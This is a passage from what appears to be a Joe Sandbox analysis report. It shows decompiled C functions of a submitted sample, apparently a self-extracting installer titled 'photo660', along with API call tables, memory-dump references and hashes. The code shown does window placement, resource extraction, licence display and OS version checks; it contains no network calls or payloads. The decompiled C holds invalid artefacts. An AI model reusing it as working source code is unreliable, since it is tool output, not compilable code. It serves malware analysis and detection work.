				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00216CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}
























                                                                                                                                                                                                        0x002143d0
                                                                                                                                                                                                        0x002143d8
                                                                                                                                                                                                        0x002143df
                                                                                                                                                                                                        0x002143e6
                                                                                                                                                                                                        0x002143ec
                                                                                                                                                                                                        0x002143f1
                                                                                                                                                                                                        0x00214400
                                                                                                                                                                                                        0x00214403
                                                                                                                                                                                                        0x0021440b
                                                                                                                                                                                                        0x00214420
                                                                                                                                                                                                        0x00214429
                                                                                                                                                                                                        0x00214437
                                                                                                                                                                                                        0x00214444
                                                                                                                                                                                                        0x00214447
                                                                                                                                                                                                        0x0021444d
                                                                                                                                                                                                        0x00214454
                                                                                                                                                                                                        0x0021445b
                                                                                                                                                                                                        0x00214460
                                                                                                                                                                                                        0x00214461
                                                                                                                                                                                                        0x00214467
                                                                                                                                                                                                        0x0021446f
                                                                                                                                                                                                        0x00214473
                                                                                                                                                                                                        0x00214473
                                                                                                                                                                                                        0x00214463
                                                                                                                                                                                                        0x00214463
                                                                                                                                                                                                        0x00214463
                                                                                                                                                                                                        0x0021447a
                                                                                                                                                                                                        0x00214481
                                                                                                                                                                                                        0x00214484
                                                                                                                                                                                                        0x0021448a
                                                                                                                                                                                                        0x00214492
                                                                                                                                                                                                        0x00214496
                                                                                                                                                                                                        0x00214496
                                                                                                                                                                                                        0x00214486
                                                                                                                                                                                                        0x00214486
                                                                                                                                                                                                        0x00214486
                                                                                                                                                                                                        0x002144b8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 002143F1
                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0021440B
                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00214423
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 0021442E
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0021443A
                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00214447
                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 002144A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2212493051-0
                                                                                                                                                                                                        • Opcode ID: cc051134e6a7c01f7dd7c66cb4159732c7e235bd536b7fe81671ffd9b0d95bcc
                                                                                                                                                                                                        • Instruction ID: b681c5fdc28963168925fd6237989457fe689078a87f58e3148a05443c0fc8a0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc051134e6a7c01f7dd7c66cb4159732c7e235bd536b7fe81671ffd9b0d95bcc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1315E32E11119AFCB14DFB8ED8C9EEBBB5EB99310F154169F805F3240DA706D458BA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00216298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E00216298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x218004; // 0x58ac7c6d
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0021171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x219124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x21a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0021171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00216CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}






















                                                                                                                                                                                                        0x00216298
                                                                                                                                                                                                        0x002162a0
                                                                                                                                                                                                        0x002162a7
                                                                                                                                                                                                        0x002162ad
                                                                                                                                                                                                        0x002162af
                                                                                                                                                                                                        0x002162bb
                                                                                                                                                                                                        0x002162c3
                                                                                                                                                                                                        0x002162c4
                                                                                                                                                                                                        0x0021633b
                                                                                                                                                                                                        0x0021633b
                                                                                                                                                                                                        0x00216345
                                                                                                                                                                                                        0x0021634d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002162da
                                                                                                                                                                                                        0x002162de
                                                                                                                                                                                                        0x0021635f
                                                                                                                                                                                                        0x00216369
                                                                                                                                                                                                        0x002162e0
                                                                                                                                                                                                        0x002162e0
                                                                                                                                                                                                        0x002162e0
                                                                                                                                                                                                        0x002162e3
                                                                                                                                                                                                        0x002162e5
                                                                                                                                                                                                        0x002162e5
                                                                                                                                                                                                        0x002162e8
                                                                                                                                                                                                        0x002162e8
                                                                                                                                                                                                        0x002162ea
                                                                                                                                                                                                        0x002162eb
                                                                                                                                                                                                        0x002162ef
                                                                                                                                                                                                        0x002162f1
                                                                                                                                                                                                        0x002162f3
                                                                                                                                                                                                        0x00216302
                                                                                                                                                                                                        0x00216308
                                                                                                                                                                                                        0x0021630d
                                                                                                                                                                                                        0x00216314
                                                                                                                                                                                                        0x00216314
                                                                                                                                                                                                        0x00216316
                                                                                                                                                                                                        0x00216319
                                                                                                                                                                                                        0x00216355
                                                                                                                                                                                                        0x00216357
                                                                                                                                                                                                        0x0021631b
                                                                                                                                                                                                        0x0021631b
                                                                                                                                                                                                        0x00216331
                                                                                                                                                                                                        0x00216334
                                                                                                                                                                                                        0x00216339
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216339
                                                                                                                                                                                                        0x00216319
                                                                                                                                                                                                        0x0021636b
                                                                                                                                                                                                        0x0021637d
                                                                                                                                                                                                        0x0021637d
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021171E: _vsnprintf.MSVCRT ref: 00211750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,002151CA,00000004,00000024,00212F71,?,00000002,00000000), ref: 002162CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,002151CA,00000004,00000024,00212F71,?,00000002,00000000), ref: 002162D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,002151CA,00000004,00000024,00212F71,?,00000002,00000000), ref: 0021631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00216345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,002151CA,00000004,00000024,00212F71,?,00000002,00000000), ref: 00216357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: ad44a0d031eb8909d734e9168252e90fab96bddaa631bb6648d3891050e2f2fe
                                                                                                                                                                                                        • Instruction ID: 19ff96b95d4c0d87119bf0257ca12ca862a21b6d912be83bbc732495be1553cf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad44a0d031eb8909d734e9168252e90fab96bddaa631bb6648d3891050e2f2fe
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42213731A10219ABCB109FA4DC4D9FFBBB8FF58710B104159FA12A3241DB758D62CBE0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00213A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00213A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0021468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x218d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0021468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x218d4c, "<None>") == 0) {
							LocalFree( *0x218d4c);
							L9:
							 *0x219124 = 0;
							return 1;
						}
						_t9 = E00216517(_t19, 0x7d1, 0, E00213100, 0, 0);
						LocalFree( *0x218d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x219124 = 0x800704c7;
						L2:
						return 0;
					}
					E002144B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x218d4c);
					 *0x219124 = 0x80070714;
					goto L2;
				}
				E002144B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x219124 = E00216285();
				goto L2;
			}






                                                                                                                                                                                                        0x00213a46
                                                                                                                                                                                                        0x00213a57
                                                                                                                                                                                                        0x00213a5d
                                                                                                                                                                                                        0x00213a63
                                                                                                                                                                                                        0x00213a6a
                                                                                                                                                                                                        0x00213a91
                                                                                                                                                                                                        0x00213a9a
                                                                                                                                                                                                        0x00213ad8
                                                                                                                                                                                                        0x00213b13
                                                                                                                                                                                                        0x00213b19
                                                                                                                                                                                                        0x00213b1b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213b21
                                                                                                                                                                                                        0x00213ae7
                                                                                                                                                                                                        0x00213af4
                                                                                                                                                                                                        0x00213afc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213afe
                                                                                                                                                                                                        0x00213a87
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213a87
                                                                                                                                                                                                        0x00213aa8
                                                                                                                                                                                                        0x00213ab3
                                                                                                                                                                                                        0x00213ab9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213ab9
                                                                                                                                                                                                        0x00213a78
                                                                                                                                                                                                        0x00213a82
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00212F64,?,00000002,00000000), ref: 00213A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00213AB3
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                          • Part of subcall function 00216285: GetLastError.KERNEL32(00215BBC), ref: 00216285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00213AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 00213B13
                                                                                                                                                                                                          • Part of subcall function 00216517: FindResourceA.KERNEL32(00210000,000007D6,00000005), ref: 0021652A
                                                                                                                                                                                                          • Part of subcall function 00216517: LoadResource.KERNEL32(00210000,00000000,?,?,00212EE8,00000000,002119E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00216538
                                                                                                                                                                                                          • Part of subcall function 00216517: DialogBoxIndirectParamA.USER32(00210000,00000000,00000547,002119E0,00000000), ref: 00216557
                                                                                                                                                                                                          • Part of subcall function 00216517: FreeResource.KERNEL32(00000000,?,?,00212EE8,00000000,002119E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00216560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00213100,00000000,00000000), ref: 00213AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: bcba8a26a3f28071b93cf2d61f73004fe1ff047fe65b1b97161fb9fccce2f6db
                                                                                                                                                                                                        • Instruction ID: 9e084987fe40a46e3ac8670044d429f4df7d06d4c150ed68087877ec527e2b6b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcba8a26a3f28071b93cf2d61f73004fe1ff047fe65b1b97161fb9fccce2f6db
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30118734251201BBD724AF32BC1DFD739FADFF9710B10843EB64AD55A1DE7988A08A64
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002124E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E002124E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x218004; // 0x58ac7c6d
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0021658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00216CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}











                                                                                                                                                                                                        0x002124e0
                                                                                                                                                                                                        0x002124eb
                                                                                                                                                                                                        0x002124f2
                                                                                                                                                                                                        0x002124f7
                                                                                                                                                                                                        0x00212504
                                                                                                                                                                                                        0x0021250e
                                                                                                                                                                                                        0x0021251d
                                                                                                                                                                                                        0x0021252c
                                                                                                                                                                                                        0x00212541
                                                                                                                                                                                                        0x00212546
                                                                                                                                                                                                        0x00212553
                                                                                                                                                                                                        0x00212555
                                                                                                                                                                                                        0x00212555
                                                                                                                                                                                                        0x00212546
                                                                                                                                                                                                        0x0021256c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00212506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0021252C
                                                                                                                                                                                                        • _lopen.KERNEL32 ref: 0021253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0021254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 00212555
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: 7856bef8b3690eeb7bcbfc4d46eaab012de85019c468d6b15731bd5d1d624e47
                                                                                                                                                                                                        • Instruction ID: 979a81e2fbac983d704f5534a38c660951e40211661805980a5440cff928278c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7856bef8b3690eeb7bcbfc4d46eaab012de85019c468d6b15731bd5d1d624e47
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E01F532601128A7C720DF69AC4CEDF7BBDEB69760F004165FA48D3190DE748E95CA91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002136EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E002136EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x218004; // 0x58ac7c6d
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x218184 = 1;
						 *0x218180 = 1;
						L13:
						 *0x219a40 = _t119;
						L14:
						__eflags =  *0x218a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00212A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00212A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x218a38 & 0x00000001;
											if(( *0x218a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("photo660");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0021681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "photo660", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E002167C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E002128E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x219a40 = _t119;
						 *0x218184 = 1;
						 *0x218180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x219a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x218184 = _t135;
							 *0x218180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E002144B9(0, _t138);
					L66:
					return E00216CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}





































                                                                                                                                                                                                        0x002136f9
                                                                                                                                                                                                        0x00213700
                                                                                                                                                                                                        0x0021370c
                                                                                                                                                                                                        0x00213716
                                                                                                                                                                                                        0x00213718
                                                                                                                                                                                                        0x0021371b
                                                                                                                                                                                                        0x00213721
                                                                                                                                                                                                        0x0021372b
                                                                                                                                                                                                        0x0021373d
                                                                                                                                                                                                        0x00213745
                                                                                                                                                                                                        0x00213746
                                                                                                                                                                                                        0x00213746
                                                                                                                                                                                                        0x00213749
                                                                                                                                                                                                        0x002137ab
                                                                                                                                                                                                        0x002137ad
                                                                                                                                                                                                        0x002137ae
                                                                                                                                                                                                        0x002137b3
                                                                                                                                                                                                        0x002137b8
                                                                                                                                                                                                        0x002137b8
                                                                                                                                                                                                        0x002137bf
                                                                                                                                                                                                        0x002137bf
                                                                                                                                                                                                        0x002137c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
